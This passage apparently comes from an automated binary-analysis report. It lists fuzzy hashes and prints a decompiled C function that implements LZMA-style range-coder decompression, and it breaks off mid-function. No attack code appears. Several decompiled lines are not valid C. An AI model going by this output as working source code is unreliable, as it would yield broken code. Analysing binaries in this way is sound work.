                                                  • Opcode Fuzzy Hash: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                                                  • Instruction Fuzzy Hash: 307124B1D00228CBDF24CF98C8447ADBBF1FB44305F15816AD856BB281D778AA96DF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E004066F0() {
                                                  				unsigned short _t531;
                                                  				signed int _t532;
                                                  				void _t533;
                                                  				signed int _t534;
                                                  				signed int _t535;
                                                  				signed int _t565;
                                                  				signed int _t568;
                                                  				signed int _t589;
                                                  				signed int* _t606;
                                                  				void* _t613;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t613 - 0x40) != 0) {
                                                  						 *(_t613 - 0x84) = 0xb;
                                                  						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                  						goto L132;
                                                  					} else {
                                                  						__eax =  *(__ebp - 0x28);
                                                  						L88:
                                                  						 *(__ebp - 0x2c) = __eax;
                                                  						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  						L89:
                                                  						__eax =  *(__ebp - 4);
                                                  						 *(__ebp - 0x80) = 0x15;
                                                  						__eax =  *(__ebp - 4) + 0xa68;
                                                  						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  						L69:
                                                  						 *(__ebp - 0x84) = 0x12;
                                                  						while(1) {
                                                  							L132:
                                                  							 *(_t613 - 0x54) = _t606;
                                                  							while(1) {
                                                  								L133:
                                                  								_t531 =  *_t606;
                                                  								_t589 = _t531 & 0x0000ffff;
                                                  								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                  								if( *(_t613 - 0xc) >= _t565) {
                                                  									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                  									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                  									 *(_t613 - 0x40) = 1;
                                                  									_t532 = _t531 - (_t531 >> 5);
                                                  									 *_t606 = _t532;
                                                  								} else {
                                                  									 *(_t613 - 0x10) = _t565;
                                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                  								}
                                                  								if( *(_t613 - 0x10) >= 0x1000000) {
                                                  									goto L139;
                                                  								}
                                                  								L137:
                                                  								if( *(_t613 - 0x6c) == 0) {
                                                  									 *(_t613 - 0x88) = 5;
                                                  									L170:
                                                  									_t568 = 0x22;
                                                  									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                  									_t535 = 0;
                                                  									L172:
                                                  									return _t535;
                                                  								}
                                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                  								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  								L139:
                                                  								_t533 =  *(_t613 - 0x84);
                                                  								while(1) {
                                                  									 *(_t613 - 0x88) = _t533;
                                                  									while(1) {
                                                  										L1:
                                                  										_t534 =  *(_t613 - 0x88);
                                                  										if(_t534 > 0x1c) {
                                                  											break;
                                                  										}
                                                  										switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
                                                  											case 0:
                                                  												if( *(_t613 - 0x6c) == 0) {
                                                  													goto L170;
                                                  												}
                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  												_t534 =  *( *(_t613 - 0x70));
                                                  												if(_t534 > 0xe1) {
                                                  													goto L171;
                                                  												}
                                                  												_t538 = _t534 & 0x000000ff;
                                                  												_push(0x2d);
                                                  												asm("cdq");
                                                  												_pop(_t570);
                                                  												_push(9);
                                                  												_pop(_t571);
                                                  												_t609 = _t538 / _t570;
                                                  												_t540 = _t538 % _t570 & 0x000000ff;
                                                  												asm("cdq");
                                                  												_t604 = _t540 % _t571 & 0x000000ff;
                                                  												 *(_t613 - 0x3c) = _t604;
                                                  												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                  												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                  												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                  												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                  													L10:
                                                  													if(_t612 == 0) {
                                                  														L12:
                                                  														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                  														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  														goto L15;
                                                  													} else {
                                                  														goto L11;
                                                  													}
                                                  													do {
                                                  														L11:
                                                  														_t612 = _t612 - 1;
                                                  														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                  													} while (_t612 != 0);
                                                  													goto L12;
                                                  												}
                                                  												if( *(_t613 - 4) != 0) {
                                                  													GlobalFree( *(_t613 - 4));
                                                  												}
                                                  												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                  												 *(_t613 - 4) = _t534;
                                                  												if(_t534 == 0) {
                                                  													goto L171;
                                                  												} else {
                                                  													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                  													goto L10;
                                                  												}
                                                  											case 1:
                                                  												L13:
                                                  												__eflags =  *(_t613 - 0x6c);
                                                  												if( *(_t613 - 0x6c) == 0) {
                                                  													 *(_t613 - 0x88) = 1;
                                                  													goto L170;
                                                  												}
                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  												_t45 = _t613 - 0x48;
                                                  												 *_t45 =  *(_t613 - 0x48) + 1;
                                                  												__eflags =  *_t45;
                                                  												L15:
                                                  												if( *(_t613 - 0x48) < 4) {
                                                  													goto L13;
                                                  												}
                                                  												_t546 =  *(_t613 - 0x40);
                                                  												if(_t546 ==  *(_t613 - 0x74)) {
                                                  													L20:
                                                  													 *(_t613 - 0x48) = 5;
                                                  													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                  													goto L23;
                                                  												}
                                                  												 *(_t613 - 0x74) = _t546;
                                                  												if( *(_t613 - 8) != 0) {
                                                  													GlobalFree( *(_t613 - 8));
                                                  												}
                                                  												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                  												 *(_t613 - 8) = _t534;
                                                  												if(_t534 == 0) {
                                                  													goto L171;
                                                  												} else {
                                                  													goto L20;
                                                  												}
                                                  											case 2:
                                                  												L24:
                                                  												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                  												 *(_t613 - 0x84) = 6;
                                                  												 *(_t613 - 0x4c) = _t553;
                                                  												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                  												L132:
                                                  												 *(_t613 - 0x54) = _t606;
                                                  												goto L133;
                                                  											case 3:
                                                  												L21:
                                                  												__eflags =  *(_t613 - 0x6c);
                                                  												if( *(_t613 - 0x6c) == 0) {
                                                  													 *(_t613 - 0x88) = 3;
                                                  													goto L170;
                                                  												}
                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  												_t67 = _t613 - 0x70;
                                                  												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                  												__eflags =  *_t67;
                                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  												L23:
                                                  												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                  												if( *(_t613 - 0x48) != 0) {
                                                  													goto L21;
                                                  												}
                                                  												goto L24;
                                                  											case 4:
                                                  												L133:
                                                  												_t531 =  *_t606;
                                                  												_t589 = _t531 & 0x0000ffff;
                                                  												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                  												if( *(_t613 - 0xc) >= _t565) {
                                                  													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                  													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                  													 *(_t613 - 0x40) = 1;
                                                  													_t532 = _t531 - (_t531 >> 5);
                                                  													 *_t606 = _t532;
                                                  												} else {
                                                  													 *(_t613 - 0x10) = _t565;
                                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                  												}
                                                  												if( *(_t613 - 0x10) >= 0x1000000) {
                                                  													goto L139;
                                                  												}
                                                  											case 5:
                                                  												goto L137;
                                                  											case 6:
                                                  												__edx = 0;
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 4);
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x34) = 1;
                                                  													 *(__ebp - 0x84) = 7;
                                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  													while(1) {
                                                  														L132:
                                                  														 *(_t613 - 0x54) = _t606;
                                                  														goto L133;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  												__esi =  *(__ebp - 0x60);
                                                  												__cl = 8;
                                                  												__cl = 8 -  *(__ebp - 0x3c);
                                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  												__ecx =  *(__ebp - 0x3c);
                                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  												__ecx =  *(__ebp - 4);
                                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  												__eflags =  *(__ebp - 0x38) - 4;
                                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  												if( *(__ebp - 0x38) >= 4) {
                                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                                  													if( *(__ebp - 0x38) >= 0xa) {
                                                  														_t98 = __ebp - 0x38;
                                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                                  														__eflags =  *_t98;
                                                  													} else {
                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  													}
                                                  												} else {
                                                  													 *(__ebp - 0x38) = 0;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                                  												if( *(__ebp - 0x34) == __edx) {
                                                  													__ebx = 0;
                                                  													__ebx = 1;
                                                  													goto L61;
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x14);
                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                  														__eflags = __eax;
                                                  													}
                                                  													__ecx =  *(__ebp - 8);
                                                  													__ebx = 0;
                                                  													__ebx = 1;
                                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  													goto L41;
                                                  												}
                                                  											case 7:
                                                  												__eflags =  *(__ebp - 0x40) - 1;
                                                  												if( *(__ebp - 0x40) != 1) {
                                                  													__eax =  *(__ebp - 0x24);
                                                  													 *(__ebp - 0x80) = 0x16;
                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  													__eax =  *(__ebp - 0x28);
                                                  													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  													__eax =  *(__ebp - 0x2c);
                                                  													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  													__eax = 0;
                                                  													__eflags =  *(__ebp - 0x38) - 7;
                                                  													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  													__al = __al & 0x000000fd;
                                                  													__eax = (__eflags >= 0) - 1 + 0xa;
                                                  													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  													__eax =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 4) + 0x664;
                                                  													__eflags = __eax;
                                                  													 *(__ebp - 0x58) = __eax;
                                                  													goto L69;
                                                  												}
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 8;
                                                  												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  												while(1) {
                                                  													L132:
                                                  													 *(_t613 - 0x54) = _t606;
                                                  													goto L133;
                                                  												}
                                                  											case 8:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 4);
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x84) = 0xa;
                                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x38);
                                                  													__ecx =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                                  													 *(__ebp - 0x84) = 9;
                                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  												}
                                                  												while(1) {
                                                  													L132:
                                                  													 *(_t613 - 0x54) = _t606;
                                                  													goto L133;
                                                  												}
                                                  											case 9:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													goto L89;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x60);
                                                  												if( *(__ebp - 0x60) == 0) {
                                                  													goto L171;
                                                  												}
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                  												__eflags = _t259;
                                                  												0 | _t259 = _t259 + _t259 + 9;
                                                  												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                  												goto L76;
                                                  											case 0xa:
                                                  												goto L0;
                                                  											case 0xb:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__ecx =  *(__ebp - 0x24);
                                                  													__eax =  *(__ebp - 0x20);
                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x24);
                                                  												}
                                                  												__ecx =  *(__ebp - 0x28);
                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  												goto L88;
                                                  											case 0xc:
                                                  												L99:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xc;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t334 = __ebp - 0x70;
                                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t334;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												goto L101;
                                                  											case 0xd:
                                                  												L37:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xd;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t122 = __ebp - 0x70;
                                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t122;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L39:
                                                  												__eax =  *(__ebp - 0x40);
                                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  													goto L48;
                                                  												}
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													goto L54;
                                                  												}
                                                  												L41:
                                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  												 *(__ebp - 0x48) = __eax;
                                                  												__eax = __eax + 1;
                                                  												__eax = __eax << 8;
                                                  												__eax = __eax + __ebx;
                                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edx = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													 *(__ebp - 0x40) = 1;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													__ebx = __ebx + __ebx + 1;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edx;
                                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L39;
                                                  												} else {
                                                  													goto L37;
                                                  												}
                                                  											case 0xe:
                                                  												L46:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xe;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t156 = __ebp - 0x70;
                                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t156;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												while(1) {
                                                  													L48:
                                                  													__eflags = __ebx - 0x100;
                                                  													if(__ebx >= 0x100) {
                                                  														break;
                                                  													}
                                                  													__eax =  *(__ebp - 0x58);
                                                  													__edx = __ebx + __ebx;
                                                  													__ecx =  *(__ebp - 0x10);
                                                  													__esi = __edx + __eax;
                                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  													__ax =  *__esi;
                                                  													 *(__ebp - 0x54) = __esi;
                                                  													__edi = __ax & 0x0000ffff;
                                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                                  													if( *(__ebp - 0xc) >= __ecx) {
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  														__cx = __ax;
                                                  														_t170 = __edx + 1; // 0x1
                                                  														__ebx = _t170;
                                                  														__cx = __ax >> 5;
                                                  														__eflags = __eax;
                                                  														 *__esi = __ax;
                                                  													} else {
                                                  														 *(__ebp - 0x10) = __ecx;
                                                  														0x800 = 0x800 - __edi;
                                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  														__ebx = __ebx + __ebx;
                                                  														 *__esi = __cx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														continue;
                                                  													} else {
                                                  														goto L46;
                                                  													}
                                                  												}
                                                  												L54:
                                                  												_t173 = __ebp - 0x34;
                                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  												__eflags =  *_t173;
                                                  												goto L55;
                                                  											case 0xf:
                                                  												L58:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xf;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t203 = __ebp - 0x70;
                                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t203;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L60:
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													L55:
                                                  													__al =  *(__ebp - 0x44);
                                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  													goto L56;
                                                  												}
                                                  												L61:
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__edx = __ebx + __ebx;
                                                  												__ecx =  *(__ebp - 0x10);
                                                  												__esi = __edx + __eax;
                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													_t217 = __edx + 1; // 0x1
                                                  													__ebx = _t217;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L60;
                                                  												} else {
                                                  													goto L58;
                                                  												}
                                                  											case 0x10:
                                                  												L109:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0x10;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t365 = __ebp - 0x70;
                                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t365;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												goto L111;
                                                  											case 0x11:
                                                  												goto L69;
                                                  											case 0x12:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 0x58);
                                                  													 *(__ebp - 0x84) = 0x13;
                                                  													__esi =  *(__ebp - 0x58) + 2;
                                                  													while(1) {
                                                  														L132:
                                                  														 *(_t613 - 0x54) = _t606;
                                                  														goto L133;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x4c);
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                  												__eflags = __eax;
                                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  												goto L130;
                                                  											case 0x13:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													_t469 = __ebp - 0x58;
                                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  													__eflags =  *_t469;
                                                  													 *(__ebp - 0x30) = 0x10;
                                                  													 *(__ebp - 0x40) = 8;
                                                  													L144:
                                                  													 *(__ebp - 0x7c) = 0x14;
                                                  													goto L145;
                                                  												}
                                                  												__eax =  *(__ebp - 0x4c);
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                  												 *(__ebp - 0x30) = 8;
                                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  												L130:
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												 *(__ebp - 0x40) = 3;
                                                  												goto L144;
                                                  											case 0x14:
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  												__eax =  *(__ebp - 0x80);
                                                  												 *(_t613 - 0x88) = _t533;
                                                  												goto L1;
                                                  											case 0x15:
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  												__al = __al & 0x000000fd;
                                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  												goto L120;
                                                  											case 0x16:
                                                  												__eax =  *(__ebp - 0x30);
                                                  												__eflags = __eax - 4;
                                                  												if(__eax >= 4) {
                                                  													_push(3);
                                                  													_pop(__eax);
                                                  												}
                                                  												__ecx =  *(__ebp - 4);
                                                  												 *(__ebp - 0x40) = 6;
                                                  												__eax = __eax << 7;
                                                  												 *(__ebp - 0x7c) = 0x19;
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												goto L145;
                                                  											case 0x17:
                                                  												L145:
                                                  												__eax =  *(__ebp - 0x40);
                                                  												 *(__ebp - 0x50) = 1;
